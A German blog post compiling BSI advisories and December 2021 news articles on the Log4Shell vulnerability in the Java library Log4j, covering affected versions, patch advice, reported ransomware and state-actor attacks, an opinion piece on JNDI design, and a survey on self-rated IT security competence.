Views: 85
Die hier wiedergegebenen Artikel zur Sicherheitslücke Log4Shell / Log4j (JAVA) sind weit eher für Fachleute geschrieben, allen voran für Administratoren von Servern. Weshalb werden sie hier wiedergegeben? Denn: dieser Blog ist ja kein Austauschplatz für IT-bewegte Geister.
Der Grund liegt darin: wer die Artikel aufmerksam liest wird, so meine ich, unschwer erkennen können, welche Unsicherheiten in der Einschätzung der Bedrohungslage bestehen. Da stellt sich zumindest für mich bald die Frage: welcher Bug, welche Schwachstelle könnte in Zukunft die weltumspannende informationstechnologische Architektur nicht nur da oder dort kurz erschüttern, sondern für einen längeren informationstechnologischen Blackout sorgen?
Schon höre ich die Heerscharen der IT-Kundigen, diese Besorgnis gleiche einer weltverschwörungsnahen Idee.
Keine Angst, liebe IT-Fachleute, wenn es denn mit der Sicherheit unseres WWW so gut bestellt ist, dann kann ich mich ja beruhigt zurücklehnen. Alles ist machbar, wir sind die Herren der Welt. Meilenweit sind wir von jeglicher Hybris entfernt. Immerhin hat es ja bloß gut sechs Tage gedauert, bis sich die Nachricht von einem weit offenen Einfallstor – es besteht seit Jahren – verbreitet hat.
Wie viele solcher unbekannten IT-sicherheitsbedrohenden offenen Einfallstore gibt es noch? Nun denn …
ÜBERSICHT
1) MITTEILUNG DES DEUTSCHEN BUNDESAMTES FÜR SICHERHEIT IN DER INFORMATIONSTECHNIK (BSI)
* BSI: Sicherheitslücke „Log4Shell“ gefährdet Systeme weltweit – Ausmaß der Bedrohungslage ist aktuell nicht abschließend feststellbar – (10.12.2021 oder später)
* BSI: Übersicht: Kritische Schwachstelle in Java-Bibliothek Log4j – 11.12.2021 und später
* BSI: Basistipps zur IT-Sicherheit – ohne Datum
2) EINZELNE MELDUNGEN
* Update: Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage – 16.12.2021
* Log4j-Lücke: Erste Angriffe mit Ransomware und von staatlichen Akteuren – Die bisherigen Angriffsversuche waren wohl vor allem Tests. Doch jetzt wird es Ernst. Cybercrime und Geheimdienste nutzen die Lücke gezielt für ihre Zwecke. – 16.12.2021
* Extrem kritische Bedrohungslage – Log4j: Das sollten Sie über die Sicherheitslücke wissen – 15.12.2021
* Open-Source-Software: Offen für alles? – Inzwischen baut Software meist auf frei verfügbaren Programmen auf, deren Quellcode jeder einsehen kann. Das bietet einige Vorteile, doch die kürzlich entdeckte Sicherheitslücke sollte ein Weckruf sein. – 15.12.2021
* Kommentar zu Log4j: Es funktioniert wie spezifiziert – 15.12.2021
* Schutz vor schwerwiegender Log4j-Lücke – was jetzt hilft und was nicht – „Warnstufe Rot“ für Anwender und Firmen, doch was bedeutet das konkret? So testen Sie Dienste auf die Log4j-Lücke und reduzieren ihr Risiko vor Angriffen. – 13.12.2021
* Mehrere Bundesbehörden von schwerer IT-Schwachstelle betroffen – 12.12.2021
* Alarmstufe Rot – Von Log4j-Lücke betroffen: Mehrere Behörden anfällig für Hacker-Angriffe – 12.12.2021
* Warnstufe Rot: Log4j-Zero-Day-Lücke bedroht Heimanwender und Firmen – Systeme abschalten, Verbindungen blockieren: Das BSI rät wegen der Zero-Day-Lücke in Log4j zu extremen Maßnahmen, Schadcode soll direkt ausführbar sein – Auch Heimanwender gefährdet – 12.12.2021
* Kritische Zero-Day-Lücke in Log4j gefährdet zahlreiche Server und Apps – Apple, Twitter, Amazon und tausende andere Dienste sind anfällig; erste Angriffe laufen bereits. Admins sollten unbedingt jetzt handeln. – 10.12.2021
3) SICHERHEITSGEFÜHL DER INTERNETNUTZER*INNEN
Zahl der Woche: Jeder Zweite unter 30 Jahren attestiert sich großes IT-Sicherheitsfachwissen – Persönliche Kompetenz bei der IT-Sicherheit ist eine Frage des Alters – 16.12.2021
………………
MITTEILUNG DES DEUTSCHEN BUNDESAMTES FÜR SICHERHEIT IN DER INFORMATIONSTECHNIK (BSI)
BSI: Sicherheitslücke „Log4Shell“ gefährdet Systeme weltweit – Ausmaß der Bedrohungslage ist aktuell nicht abschließend feststellbar – (10.12.2021 oder später)
Seit dem 10.12.2021 warnt das BSI vor einer extrem kritischen Bedrohung in der Java-Bibliothek „Log4j“. Die Sicherheitslücke (CVE-2021-44228) hat den Namen „Log4Shell“ erhalten und führt eventuell zur Verwundbarkeit von global mehreren Milliarden Computern.
Was bedeutet das für Verbraucherinnen und Verbraucher?
Die größte Gefahr stellt die Schwachstelle „Log4Shell“ für Betreiber von Servern und Rechenzentren dar. Dennoch können Verbraucherinnen und Verbraucher angreifbar sein, zum Beispiel wenn auf privaten Geräten verwundbare Log4j-Versionen eingesetzt werden. Selbst wenn nicht, könnten Anwenderinnen und Anwender Schaden davontragen, indem ihre Daten gestohlen werden, wichtige Dienste ausfallen oder ihre Systeme infiziert werden:
Sofern die Hersteller Ihrer IT, Ihrer Betriebssysteme oder Ihrer installierten Programme Updates zur Verfügung stellen, sollten Sie diese umgehend installieren.
*** Was ist „Log4j“?
„Log4j“ ist eine weit verbreitete Bibliothek für Java-Anwendungen. Eine Bibliothek ist Software, die zur Umsetzung einer bestimmten Funktionalität in weitere Produkte eingebunden wird. Sie ist daher oftmals tief in der Architektur von Software-Produkten verankert. Die Bibliothek „Log4j“ stellt zum Beispiel Funktionalitäten zur Protokollierung von Programmaktivitäten zur Verfügung. Diese Protokolle dienen oft der Fehlersuche und sind deshalb in Software üblich. Da „Log4j“ diese Meldungen bislang schnell und effizient verwaltet hat, wurde die Bibliothek von vielen Systemadministratoren und Programmierern auf der ganzen Welt in Systeme eingebaut.
*** Warum ist die Schwachstelle „Log4Shell“ so gefährlich?
Die Schwachstelle „Log4Shell“ ermöglicht Cyber-Kriminellen, Eingaben etwa auf einem Zielserver vorzunehmen, um dann Schadsoftware auszuführen oder sogar die Kontrolle über das gesamte System zu übernehmen. Das geht auf einfachste Weise, z. B. durch spezielle Befehle in einem Chat oder einer Konsole, sodass das attackierte System jegliche Eingaben des Angreifers zulässt und er schließlich die Kontrolle über die Funktionen und Daten erlangt, die auf diesem System gespeichert sind.
Im populären Online-Videospiel Minecraft beispielsweise sollen Kriminelle die Lücke auf gewissen Servern ausnutzen können, indem sie lediglich bestimmte Chat-Nachrichten eingeben. Damit könnten sie Spielserver oder Accounts übernehmen und so die IT-Sicherheit der Spielerinnen und Spieler gefährden.
Das bedeutet, dass nun Produkte zahlreicher Internetkonzerne schwerwiegende Sicherheitslücken aufweisen, aber auch diverse Homeoffice-Anwendungen zeitweise als unsicher gelten. Die kritische Schwachstelle „Log4Shell“ hat demnach möglicherweise Auswirkungen auf alle aus dem Internet erreichbaren Java-Anwendungen, die mit Hilfe von „Log4j“ Teile der Nutzeranfragen protokollieren.
Welche Systeme sind verwundbar?
Das Ausmaß der Bedrohungslage ist aktuell nicht abschließend feststellbar. Weltweit führen Cyber-Sicherheitsbehörden, Unternehmen und CERTs Massenscans durch und entdecken verwundbare Systeme sowie bereits erfolgreich durchgeführte Angriffe. Aktuell ist davon auszugehen, dass „Log4j“ in den Versionen 1.x bis 2.14.1 verwundbar ist. Die Schwachstelle wurde mit dem höchstmöglichen CVSS-Score von 10,0 bewertet. Zusätzlich wurde eine Schwachstelle (CVE-2021-45056) in der Version 2.15 mit dem CVSS-Score 3,7/10 identifiziert, die in der Verison 2.16.0 behoben wurde. Neben großer Rechenzentren und Unternehmensserver können aber auch Netzwerktechnologien und Systemkomponenten „Log4j“ einsetzen, die bei kleinen und mittelständischen Firmen oder bei Verbraucherinnen und Verbrauchern im Betrieb sind. Die Hersteller dieser Systeme stellen teilweise bereits Updates zur Verfügung.
*** Was tue ich, wenn ich selbst Administrator bin und Log4j nutze?
Führen Sie das Update auf die aktuelle Version 2.16.0 von „Log4j“ schnellstmöglich in allen Anwendungen durch!
Spielen Sie Updates Ihrer übrigen Geräte und Dienste ein, sobald sie zur Verfügung stehen!
Schalten Sie nicht zwingend benötigte Systeme ab.
Prüfen Sie, mit welchen Rechten die betroffenen Dienste versehen sind und reduzieren Sie diese auf das notwendige Minimum.
Server sollten generell nur solche Verbindungen (insbesondere in das Internet) aufbauen dürfen, die für den Einsatzzweck zwingend notwendig sind.
Weitere Maßnahmen für Administratoren
Für weitere aktuelle Informationen rund um die IT-Sicherheit können Sie den BürgerCert-Newsletter und die Sicherheitshinweise des BSI abonnieren.
https://www.bsi.bund.de/DE/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Schwachstelle-log4Shell-Java-Bibliothek/log4j_node.html
BSI: Übersicht: Kritische Schwachstelle in Java-Bibliothek Log4j – 11.12.2021 und später
https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Informationen-und-Empfehlungen/Empfehlungen-nach-Angriffszielen/Webanwendungen/log4j/log4j_node.html
BSI: Kritische Schwachstelle in Java-Bibliothek Log4j – 10.12.2021, Update 13.12.2021 (Version 1.4)
(7-Seiten-PDF): https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.pdf?__blob=publicationFile&v=8
BSI: Basistipps zur IT-Sicherheit – ohne Datum
https://www.bsi.bund.de/DE/Themen/Verbraucherinnen-und-Verbraucher/Informationen-und-Empfehlungen/Cyber-Sicherheitsempfehlungen/cyber-sicherheitsempfehlungen_node.html
CYBERSICHERHEIT – Update: Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage – 16.12.2021
Die Schwachstelle namens „Log4Shell“ in der weit verbreiteten Java-Bibliothek Log4j führt nach Einschätzung des Bundesamts für Sicherheit in der Informationstechnik (BSI) weiterhin zu einer kritischen IT-Sicherheitslage. Das BSI stellt aktuelle Informationen unter www.bsi.bund.de/dok/log4j zur Verfügung.
Nach wie vor besteht keine abschließende Klarheit darüber, welche IT-Produkte durch „Log4Shell“ verwundbar sind. Einen Überblick über den Verwundbarkeitsstatus zahlreicher IT-Produkte pflegt die niederländische Partnerbehörde des BSI, zu der auch das BSI selbst beiträgt.
Die Schwachstelle wird aktuell mit unterschiedlichen Angriffsformen weltweit ausgenutzt. Neben Angriffen mit Krypto-Minern (dadurch werden die betroffenen Systeme zur Errechnung von Krypto-Währungen missbraucht) oder Bot-Netzen (die betroffenen Systeme werden in Bot-Netze integriert, mit denen bspw. DDoS-Angriffe durchgeführt werden), sind mittlerweile auch die ersten Ransomware-Angriffe bekannt geworden. Bei Ransomware-Angriffen werden Computer oder ganze Netzwerke verschlüsselt und die Betroffenen um Lösegeld erpresst.
Aus Sicht des BSI ist mit einer breiten Ausnutzung der Schwachstelle und mit weiteren erfolgreichen Cyber-Angriffen zu rechnen. Diese können auch noch in einigen Wochen und Monaten folgen, wenn die genannte Schwachstelle jetzt für eine Erstinfektion genutzt wird.
Es ist daher weiterhin wichtig, die vom BSI empfohlenen IT-Sicherheitsmaßnahmen schnellstmöglich umzusetzen. Sofern Sicherheits-Updates für verwundbare IT-Produkte zur Verfügung stehen, sollten diese durch alle Anwenderinnen und Anwender eingespielt werden. Daher sind insbesondere Hersteller von IT-Produkten gefordert, ihre Produkte zu prüfen und sie gegebenenfalls durch Sicherheits-Updates abzusichern.
Akut handeln müssen insbesondere Unternehmen und Organisationen und staatliche Stellen auf allen Ebenen. Für diese stehen auch kurzfristige Schutzmaßnahmen zur Verfügung, die die Schwachstelle zwar nicht schließen, ihre Ausnutzung aber verhindern oder erschweren können. Daneben sollten Detektions- und Reaktionsmaßnahmen gestärkt werden.
Verbraucherinnen und Verbraucher sind weniger stark gefährdet, da die fragliche Java-Bibliothek auf Endgeräten weniger stark verbreitet ist. Allerdings können einzelne Anwendungen und smarte Geräte (IoT-Geräte) verwundbar sein. Verbraucherinnen und Verbraucher sind in der Regel darauf angewiesen, dass die Hersteller dieser Produkte entsprechende Sicherheitsmaßnahmen treffen und bspw. Sicherheits-Updates zur Verfügung stellen. Die bestehenden kurzfristigen Schutzmaßnahmen können in der Regel nur von erfahrenen Anwenderinnen und Anwendern umgesetzt werden.
Das BSI wird seine Cyber-Sicherheitswarnung und seine Handlungsempfehlungen fortlaufend aktualisieren. Das Nationale IT-Krisenreaktionszentrum im BSI bleibt weiterhin aktiv. Das BSI steht in intensivem Austausch mit nationalen und internationalen Partnern.
*** Vorangegangene Pressemitteilung
Bonn, 11.12.2021. Die kritische Schwachstelle (Log4Shell) in der weit verbreiteten Java-Bibliothek Log4j führt nach Einschätzung des Bundesamts für Sicherheit in der Informationstechnik (BSI) zu einer extrem kritischen Bedrohungslage. Das BSI hat daher seine bestehende Cyber-Sicherheitswarnung auf die Warnstufe Rot hochgestuft. Ursächlich für diese Einschätzung ist die sehr weite Verbreitung des betroffenen Produkts und die damit verbundenen Auswirkungen auf unzählige weitere Produkte. Die Schwachstelle ist zudem trivial ausnutzbar, ein Proof-of-Concept ist öffentlich verfügbar. Eine erfolgreiche Ausnutzung der Schwachstelle ermöglicht eine vollständige Übernahme des betroffenen Systems. Dem BSI sind welt- und deutschlandweite Massen-Scans sowie versuchte Kompromittierungen bekannt. Auch erste erfolgreiche Kompromittierungen werden öffentlich gemeldet.
Das ganze Ausmaß der Bedrohungslage ist nach Einschätzung des BSI aktuell nicht abschließend feststellbar. Zwar gibt es für die betroffene Java-Bibliothek Log4j ein Sicherheits-Update, allerdings müssen alle Produkte, die Log4j verwenden, ebenfalls angepasst werden. Eine Java-Bibliothek ist ein Software-Modul, das zur Umsetzung einer bestimmten Funktionalität in weiteren Produkten verwendet wird. Es ist daher oftmals tief in der Architektur von Software-Produkten verankert. Welche Produkte verwundbar sind und für welche es bereits Updates gibt, ist derzeit nicht vollständig überschaubar und daher im Einzelfall zu prüfen. Es ist zu erwarten, dass in den nächsten Tagen weitere Produkte als verwundbar erkannt werden.
Das BSI empfiehlt insbesondere Unternehmen und Organisationen, die in der Cyber-Sicherheitswarnung skizzierten Abwehrmaßnahmen umzusetzen. Darüber hinaus sollten die Detektions- und Reaktionsfähigkeiten kurzfristig erhöht werden, um die eigenen Systeme angemessen überwachen zu können. Sobald Updates für einzelne Produkte verfügbar sind, sollten diese eingespielt werden. Darüber hinaus sollten alle Systeme auf eine Kompromittierung untersucht werden, die verwundbar waren.
https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2021/211211_log4Shell_WarnstufeRot.html
CYBERSICHERHEIT – Log4j-Lücke: Erste Angriffe mit Ransomware und von staatlichen Akteuren – Die bisherigen Angriffsversuche waren wohl vor allem Tests. Doch jetzt wird es Ernst. Cybercrime und Geheimdienste nutzen die Lücke gezielt für ihre Zwecke. – 16.12.2021
Mehrere IT-Sicherheits-Teams berichten von aktuellen Angriffen bezüglich der Log4Shell-Sicherheitslücke. Demzufolge nutzen staatliche Gruppierungen die Schwachstelle für ihre Zwecke aus. Aber auch Cybergangster verteilen bereits Krypto-Miner und sogar Ransomware, um Profit aus der Lücke zu schlagen.
Ein Großteil der Angriffe auf die Lücke seien immer noch allgemeine Scans auf Verwundbarkeit durch Sicherheitsforscher, aber auch durch Cyberkriminelle. Doch deren schiere Anzahl nimmt bereits etwas ab. Doch das bedeutet keine Entwarnung. Der Content-Delivery-Netzwerk-Spezialist Akamai vermeldet, dass deren Systeme stündlich 250.000 Angriffsversuche auf die CVE-2021-44228-Lücke feststellen. Das Unternehmen geht davon aus, dass uns solche Attacken noch monatelang begleiten werden.
*** Angriffsziel Minecraft
Microsofts Threat Intelligence Center (MSTIC) berichtet unterdessen, dass auch nicht von dem Unternehmen gehostete Minecraft-Server attackiert würden. Diese seien in einigen der Fälle etwa durch eine Erweiterung für die Log4j-Lücke anfällig, die Dritthersteller-Modifikationen lädt. Die Angreifer hätten manipulierte Textnachrichten im Spiel gesendet, die die Log4Shell-Lücke zum Ausführen des Schadcodes sowohl auf dem Server als auch auf den angebundenen Clients missbrauche.
Bei der dabei eingeschleusten Java-Klasse handele es sich um die Khonsari-Ransomware, die im Kontext des Java-Interpreter javaw.exe ausgeführt werde. Weiterhin haben die Redmonder Sicherheitsforscher beobachtet, dass Angreifer Powershell-basierte Reverse-Shells über die Lücke einschmuggelten.
Dadurch erhielten sie vollen Zugriff auf die kompromittierte Maschine und installierten die Malware Mimikatz, um Zugangsdaten zu stehlen. Da die Forscher noch keine weiteren darauf aufbauenden Aktivitäten festgestellt haben, mutmaßen sie, dass die Angreifer sie für einen späteren Einsatz sammeln. Sie weisen darauf hin, dass Serverbetreiber dringend die bereitstehenden Updates installieren sollten.
*** Staatliche Akteure
Microsofts Analysten schreiben zudem, dass von ihnen beobachtete staatliche Gruppen aus China, dem Iran, Nordkorea und der Türkei die Lücke ebenfalls untersuchen. Die Aktivitäten reichten von Experimenten in der Entwicklung, über das Integrieren der Schwachstelle in den in freier Wildbahn genutzten Exploit-Baukasten hin zum direkten Ausnutzen der Lücke, um die verfolgten Ziele der Angreifer zu erreichen.
Die iranische Gruppierung Phosphorus habe etwa Ransomware auf anfällige Server installiert. Hafnium, eine chinesisch-staatliche Gruppe, habe eher Virtualisierungsinfrastruktur im Blick und nutze einen DNS-Dienst, um Aktivitäten auszuforschen.
Ransomware als Dienstleistung
Weitere Gruppen aus dem Bereich Ransomware-as-a-Service seien dabei beobachtet worden, dass sie durch die Log4j-Lücke initiale Zugänge zu den Netzwerken ergatterten. Anschließend böten sie Zugänge anderen Gruppen an. Microsoft habe dabei Angriffe sowohl auf Linux-, als auch auf Windows-Systeme gesehen und geht davon aus, dass mehr von Menschen manuell gesteuerte Ransomware-Angriffe zu erwarten seien.
Des Weiteren haben Cybergangs ihre kriminellen Aktivitäten angepasst. Das Mirai-Botnetz installiere via Log4Shell Krypto-Miner sowie die Tsunami-Backdoor auf Linux-Server. Die Angriffe zielten sowohl auf Windows-, als auch auf Linux-Systeme. Die Base64-codierten Befehle in der manipulierten JDNI://ldap-Anfrage starteten Bash-Befehle unter Linux und Powershell in Windows.
Zudem haben Forscher Angriffe gesehen, bei denen kein Schadcode eingeschleust wurde, sondern lediglich Informationen abflossen. Das könne auf Netzwerkgeräten mit SSL-Verschlüsselung zum Ausspähen von geheimen Informationen und Daten genutzt werden.
Mandiant hat ebenfalls staatliche kontrollierte Angriffe von Gruppen aus dem Iran und China gesehen und bestätigt Microsofts Beobachtungen. In einigen Fällen arbeiteten die Gruppen schon ihre Listen von Zielen ab. In anderen würden sie zunächst einbrechen, um gegebenenfalls später bei einer Beauftragung weiter vorzudringen. Das IT-Sicherheitsunternehmen erwartet eine Zunahme an bösartigen staatlichen Aktivitäten.
Zwischenbilanz
Die Bedrohungslage ist sehr ernst. Cyberkriminelle machen umfassend verwundbare Systeme ausfindig und greifen sie an. Administratoren und Sicherheitsverantwortliche müssen ihnen möglichst zuvorkommen und rasch angreifbare Systeme identifizieren und absichern. Ähnlich einer Schutzimpfung gilt es abzuwägen, was gegebenenfalls schlimmere Auswirkungen hat: Das Update mit möglicherweise kurzen Systemausfällen – vergleichbar mit der Impfung, oder der längerfristige Ausfall etwa durch Ransomware-Befall mit möglicherweise noch schlimmeren Folgen, analog dem Durchmachen der Krankheit. Thüringen hat dies konsequent gelöst, indem die IT-Sicherheitsexperten des Landes Anfang der Woche weite Teile der IT schlicht offline genommen, auf Verwundbarkeit untersucht sowie bei Bedarf aktualisiert haben.
Das github-Repository der CISA mit der Liste verwundbarer Systeme und Anwendungen ist inzwischen Prall gefüllt. Unzählige Anwendungen sind dort mit Status verwundbar, nicht betroffen oder etwa in Untersuchung versammelt; zudem mit Link auf entsprechende Hersteller-Sicherheitsmeldungen. Für IT-Verantwortliche eine sehr nützliche Handreichung, um schnell einen ersten Überblick zu erhalten, ob sie verwundbare Systeme einsetzen und aktualisieren müssen.
Das heise-Security-Webinar Die Log4j-Lücke – der Praxis-Ratgeber für Admins am Montag, dem 20. Dezember gibt konkrete Hilfestellung für den Umgang mit Log4j im Unternehmens- und Behördenumfeld.
https://www.heise.de/news/Log4j-Luecke-Erste-Angriffe-mit-Ransomware-und-von-staatlicher-Akteuren-6296549.html
CYBERSICHERHEIT – Cybersicherheit – Zahl der Woche: Jeder Zweite unter 30 Jahren attestiert sich großes IT-Sicherheitsfachwissen – Persönliche Kompetenz bei der IT-Sicherheit ist eine Frage des Alters – 16.12.2021
Bochum (pts035/16.12.2021/14:50) – Beim Thema IT-Sicherheit hängt die persönliche Kompetenz von unterschiedlichen Faktoren ab: Das Alter, das Geschlecht oder die Frage, wer im Homeoffice arbeitet, spielen dabei eine wichtige Rolle. Das zeigt die aktuelle Umfrage „Cybersicherheit in Zahlen“ von G DATA in Zusammenarbeit mit Statista und brand eins.
Mehr als 50 Prozent der Menschen unter 30 Jahren schätzen die eigene Kompetenz für IT-Sicherheit als groß oder sehr groß ein. Das belegt die aktuelle Umfrage „Cybersicherheit in Zahlen“ von G DATA, Statista und brand eins Sie zeigt weiter: Fachwissen rund um IT-Sicherheit ist eine Frage des Alters und des Geschlechts. Bei Befragten ab 50 Jahren stuft nur jeder Fünfte seine Kompetenz als groß oder sehr groß ein. Eine mögliche Erklärung: Das Einstiegsalter für digitale Endgeräte sinkt kontinuierlich. Das Leben der jüngeren Generation spielt sich in großen Teilen online ab und auch ein Großteil ihrer persönlichen Identität. Die Digitalisierung ist dabei, wenn wir Beziehungen pflegen, Wissen gewinnen, Termine planen, uns ausweisen, Verträge schließen, einkaufen und bezahlen. Ein Großteil dieser persönlichen Informationen bedarf auch eines guten Schutzes vor externen Zugriffen. Mit dieser Frage scheinen sich jüngere Menschen intensiver auseinanderzusetzen als Ältere.
„Kaum ein Tag vergeht, an dem nicht private Daten im Internet veröffentlicht werden. Diese zunehmenden Leaks sind besorgniserregend“, sagt Hauke Gierow, IT-Sicherheitsexperte bei G DATA CyberDefense. „Unsere Umfrage zeigt, dass es zwar in jüngeren Altersgruppen eine bessere IT-Sicherheitskompetenz gibt. Aber auch hier bestehen zum Beispiel zwischen den Geschlechtern große Unterschiede. Security Awareness sollte daher in allen Altersgruppen regelmäßig trainiert werden.“
*** Sicherheitsaffine Menschen arbeiten im Homeoffice
Die Umfrage deckt auch einen Unterschied zwischen Männern und Frauen bei der Einschätzung der IT-Sicherheitskompetenz auf. 42,5 Prozent der befragten Männer schätzt das eigene Wissen mit hoch und sehr hoch ein. Aber nur 24,7 Prozent der Frauen sprechen sich ein großes Fachwissen zu. Nicht nur zwischen Männern und Frauen besteht eine große Differenz: Auch, ob die Befragten sich im Homeoffice befinden oder nicht, macht einen großen Unterschied bei der persönlichen Kompetenz bei IT-Sicherheit. Wer sich unsicher fühlt, tendiert eher dazu, im Büro zu arbeiten als im Homeoffice. Denn Personen, die im Homeoffice arbeiten, schätzen sich mit über 41 Prozent als sehr kompetent ein, im Gegensatz dazu liegen Personen, die nicht im Homeoffice arbeiten bei knapp über 19 Prozent.
Die Studie „Cybersicherheit in Zahlen“ zeichnet sich durch eine hohe Informationsdichte und besondere methodische Tiefe aus: Mehr als 5.000 Arbeitnehmer*innen in Deutschland wurden im Rahmen einer repräsentativen Online-Studie zur Cybersicherheit im beruflichen und privaten Kontext befragt. Die Experten von Statista haben die Befragung durchgeführt und können dank einer Stichprobengröße, die weit über dem branchenüblichen Standard liegt, belastbare und valide Marktforschungsergebnisse im Heft „Cybersicherheit in Zahlen“ präsentieren.
Das Magazin „Cybersicherheit in Zahlen“ gibt es zum Download unter: https://www.gdata.de/cybersicherheit-in-zahlen
https://www.pressetext.com/news/20211216035
CYBERSICHERHEIT – Extrem kritische Bedrohungslage – Log4j: Das sollten Sie über die Sicherheitslücke wissen – 15.12.2021
Alarmstufe Rot: Das Bundesamt für Sicherheit in der Informationstechnik warnt vor einer gravierenden Sicherheitslücke. Hier sind die wichtigsten Fragen und Antworten für Nutzer.
Die Lage ist ernst: Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat in einer Mitteilung vor einer gravierenden Sicherheitslücke in der Software Log4j gewarnt. Log4j ist ein Bestandteil von Java-Anwendungen, die weltweit in Computersystemen eingesetzt werden.
Die größte Gefahr stellt die Schwachstelle für Betreiber von Servern und Rechenzentren dar. Aber auch Verbraucher können betroffen sein. https://www.t-online.de/digital/sicherheit/id_100003908/gravierende-sicherheitsluecke-bundesamt-fuer-sicherheit-warnt-vor-log4j.html
CYBERSICHERHEIT – Open-Source-Software: Offen für alles? – Inzwischen baut Software meist auf frei verfügbaren Programmen auf, deren Quellcode jeder einsehen kann. Das bietet einige Vorteile, doch die kürzlich entdeckte Sicherheitslücke sollte ein Weckruf sein. – 15.12.2021
Das vergangene Wochenende war für Softwareentwickler auf der ganzen Welt ein Albtraum: Nachdem eine Sicherheitslücke enormen Ausmaßes publik wurde, »die selbst Sechsjährige ausnutzen können«, rief das Bundesamt für Sicherheit in der Informationstechnik (BSI) die höchste Warnstufe aus. Betroffen sind demnach zahlreiche Programme, die in verschiedensten Bereichen eingesetzt werden, von Minecraft, Cisco-Systemen, Apple iCloud, Amazon Web Services und so weiter. Nun stellt sich die Welt eine Frage: Wie konnte es dazu kommen?
Tatsächlich wirkt das Programm Log4j von Apache, das die Probleme verursacht, auf den ersten Blick ziemlich harmlos. Es handelt sich um einen so genannten Logger, der lediglich protokolliert, welche Aktivitäten auf einer Software ablaufen. Logger benötigt man teilweise aus rechtlichen Gründen, um nachzuweisen, wie eine bestimmte Anwendung genutzt wurde, aber auch, um eventuelle Fehler aufzuspüren. Nun hat sich allerdings herausgestellt, dass Log4j eine gravierende Sicherheitslücke hat. Sie macht es einem Angreifer möglich, Programmcode unbemerkt auf einem Rechner, auf dem der Logger läuft, einzufügen und diesen dort auch auszuführen. So kann man etwa Daten stehlen oder mit fremder Rechenleistung Kryptowährungen schürfen.
Das Ausmaß der Sicherheitsbedrohung ist so groß, weil Log4j enorm weit verbreitet ist und in verschiedensten Anwendungen zum Einsatz kommt. Denn es ist eine Open-Source-Software (kurz: OSS), das heißt, der Quellcode ist frei zugänglich und für jeden unentgeltlich nutzbar. Tatsächlich basiert inzwischen ein Großteil der genutzten IT-Infrastruktur auf OSS, die sich im Allgemeinen als viel sicherer erweist als kommerzielle Varianten. Während beispielsweise der Quellcode des frei verfügbaren Betriebssystems Linux durchschnittlich 0,17 Fehler pro 1000 Zeilen Code besitzt, sind es bei den kommerziellen Systemen zwischen 20 und 30, wie »Wired« bereits 2004 berichtete. Das ist nicht weiter verwunderlich: Wenn ein Programmcode öffentlich zugänglich ist, können ihn viele Personen überprüfen, wodurch sich mehr Fehler ausräumen lassen. …
https://www.spektrum.de/news/log4j-sicherheitsluecke-und-open-source/1961080
CYBERSICHERHEIT- Kommentar zu Log4j: Es funktioniert wie spezifiziert – 15.12.2021
Über den Java-Slogan „Write Once, Run Everywhere“ wurden schon viele Witze gemacht. Den log4j-Exploit behandeln viele nun wie einen Bug – aber das ist er nicht.
Eine kritische Lücke in der Java-Bibliothek Log4j beherrscht gerade die Schlagzeilen. Die IT-Welt ruft „Warnstufe Rot“ aus – weil offenbar der log4j-Code JNDI-Variablenexpansion vornehmen kann.
Doch was ist JNDI? Jindi al Dap ist der Name eines alten arabischen Philosophen und Mathematik-Pioniers, der für Sun/Oracle gearbeitet hat, um ein System von Directory Lookups in Java zu entwickeln. Dieses System lädt irgendwie Code aus dem Internet nach. Aber selbst, wenn man länger auf das Systemdiagramm starrt, erkennt man nicht unbedingt sofort, an welcher Stelle sich der Java CLASSPATH so erweitert, dass er das gesamte Internet umfasst:
SCHAUBILD: https://heise.cloudimg.io/v7/_www-heise-de_/imgs/18/3/2/3/2/1/2/3/bild1-c15dbca1707f9c15.png?q=85&width=610
… Dank JDNI SPI können wir also Java Classfiles von einem LDAP-Server ausliefern lassen, die angeblich ein Printer-Object generieren, wenn wir nach einem Printer fragen – dann aber stattdessen Doom installieren. Oder einen Kryptominer oder Verschlüsselungstrojaner. So geht Enterprise Security.
… Aber im Ernst: Viele behandeln den log4j-Exploit wie einen Bug, einen Programmierfehler, eine Verletzung einer Spezifikation. Genau das ist jedoch nicht der Fall: Es funktioniert – wortwörtlich – endlich einmal alles wie spezifiziert und dokumentiert: All die Modularität und dynamische Erweiterbarkeit von Java hat ganz wunderbar und genau wie geplant zusammengearbeitet und funktioniert. Darauf haben wir dekadenlang hingearbeitet! „NOTABUG, WONTFIX“
Und das ist das eigentliche Problem hier. Viele rufen jetzt nach „Mehr Kontrolle!“, „Mehr Review!“, „Mehr Funding!“, „Mehr Augen auf den Code!“. Was wirklich helfen würde, wäre weniger Code, weniger Indirektion und Boilerplate, und einfach mehr… Einfachheit.
Wieso brauche ich ein LogAppenderFactorySingleton, das XML liest, um den Namen der Klasse zu bekommen, die es instanziieren muss, damit ich meine Logzeile da einwerfen kann, um sie asynchron an einen LogStream anzuhängen? Das ist nicht einfach. Was ist einfach? JSON nach stderr drucken. Das ist einfach. Aber Firmen stellen seit etwa einer Dekade Leute ein, die nicht wissen, was stdout und stderr sind und das ist irgendwie okay, weil inzwischen ja sowieso alles ein Webservice ist. …
https://www.heise.de/meinung/Kommentar-zu-log4j-Es-funktioniert-wie-spezifiziert-6294476.html?seite=2
CYBERSICHERHEIT – Schutz vor schwerwiegender Log4j-Lücke – was jetzt hilft und was nicht – „Warnstufe Rot“ für Anwender und Firmen, doch was bedeutet das konkret? So testen Sie Dienste auf die Log4j-Lücke und reduzieren ihr Risiko vor Angriffen. – 13.12.2021
Die Sicherheitslücke im Java-Logging log4j sorgt für Schlagzeilen und viel Verunsicherung. Man weiß, dass die Lücke sehr weitverbreitet und trivial auszunutzen ist. Doch es ist noch längst nicht klar, was alles konkret betroffen ist und wie man sich jetzt am besten schützen kann. heise Security erklärt, sortiert und hilft, das Problem einzudämmen.
